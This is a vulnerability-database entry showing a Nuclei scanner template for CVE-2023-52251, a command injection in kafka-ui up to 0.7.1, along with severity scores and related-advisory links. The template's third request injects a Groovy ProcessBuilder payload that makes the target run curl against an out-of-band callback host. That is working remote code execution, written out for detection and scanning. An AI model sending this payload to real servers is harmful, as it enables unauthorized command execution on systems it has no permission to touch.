Lucene search
ProjectDiscoveryNUCLEI:CVE-2023-52251HistoryMar 14, 2024 - 8:49 a.m.
Kafka UI 0.7.1 Command Injection
2024-03-1408:49:09
ProjectDiscovery
github.com
1
cve
cve2023
command-injection
kafka
kafka-ui
packetstorm
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.8 High
AI Score
Confidence
Low
0.92 High
EPSS
Percentile
99.0%
An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
id: CVE-2023-52251
info:
name: Kafka UI 0.7.1 Command Injection
author: yhy0,iamnoooob
severity: high
description: |
An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
reference:
- http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html
- https://github.com/BobTheShoplifter/CVE-2023-52251-POC
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-52251
cwe-id: CWE-94
epss-score: 0.03218
epss-percentile: 0.91206
cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:*
metadata:
verified: true
max-request: 3
vendor: provectus
product: ui
framework: kafka
fofa-query: icon_hash="-1477045616"
tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm
http:
- raw:
- |
GET /api/clusters HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: cluster-name
internal: true
json:
- '.[0].name'
- raw:
- |
GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1
Host: {{Hostname}}
extractors:
- type: json
name: topic-name
internal: true
json:
- '.topics[].name'
- raw:
- |
@timeout 20s
GET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: word
part: body
words:
- 'Assigning partitions'
# digest: 4b0a0048304602210090dcbdf999787073e347b90236896f106cca2b7ba465b80d3e338f35b1e50d8802210088f1ccf1eab30ea3f481aec5b0721a90153b605601fe3212d5ac1c7406f9f858:922c64590222798bb761d5b6d8e72950Related
prion
prion
Code injection
2024-01-25 21:15:00
nvd
nvd
CVE-2023-52251
2024-01-25 21:15:08
metasploit
metasploit
githubexploit
githubexploit
Exploit for Code Injection in Provectus Ui
2024-01-06 11:07:36
cvelist
cvelist
CVE-2023-52251
2024-01-25 00:00:00
packetstorm
packetstorm
Kafka UI 0.7.1 Command Injection
2024-02-20 00:00:00
cve
cve
CVE-2023-52251
2024-01-25 21:15:08
osv
osv
CVE-2023-52251
2024-01-25 21:15:08
zdt
zdt
Kafka UI 0.7.1 Command Injection Exploit
2024-02-20 00:00:00
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up 02/23/2024
2024-02-23 17:50:39
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
7.8 High
AI Score
Confidence
Low
0.92 High
EPSS
Percentile
99.0%
Related for NUCLEI:CVE-2023-52251